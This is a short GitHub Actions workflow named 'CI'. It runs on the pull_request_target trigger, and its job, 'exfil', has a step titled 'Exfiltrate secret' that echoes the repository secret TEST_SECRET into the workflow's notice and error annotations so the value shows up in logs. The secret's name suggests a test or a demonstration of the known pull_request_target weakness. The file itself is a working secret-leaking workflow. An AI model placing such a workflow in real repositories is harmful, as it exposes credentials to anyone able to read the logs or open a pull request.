name: CI
on:
  pull_request_target:
    types: [opened, synchronize]

jobs:
  exfil:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Exfiltrate secret
        run: |
          echo "::notice ::SECRET IS: ${{ secrets.TEST_SECRET }}"
          echo "::error ::SECRET VALUE: ${{ secrets.TEST_SECRET }}"
